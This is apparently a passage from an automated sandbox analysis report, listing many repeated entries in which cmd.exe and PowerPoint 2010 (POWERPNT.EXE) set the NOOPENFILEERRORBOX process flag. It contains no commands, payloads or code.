            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior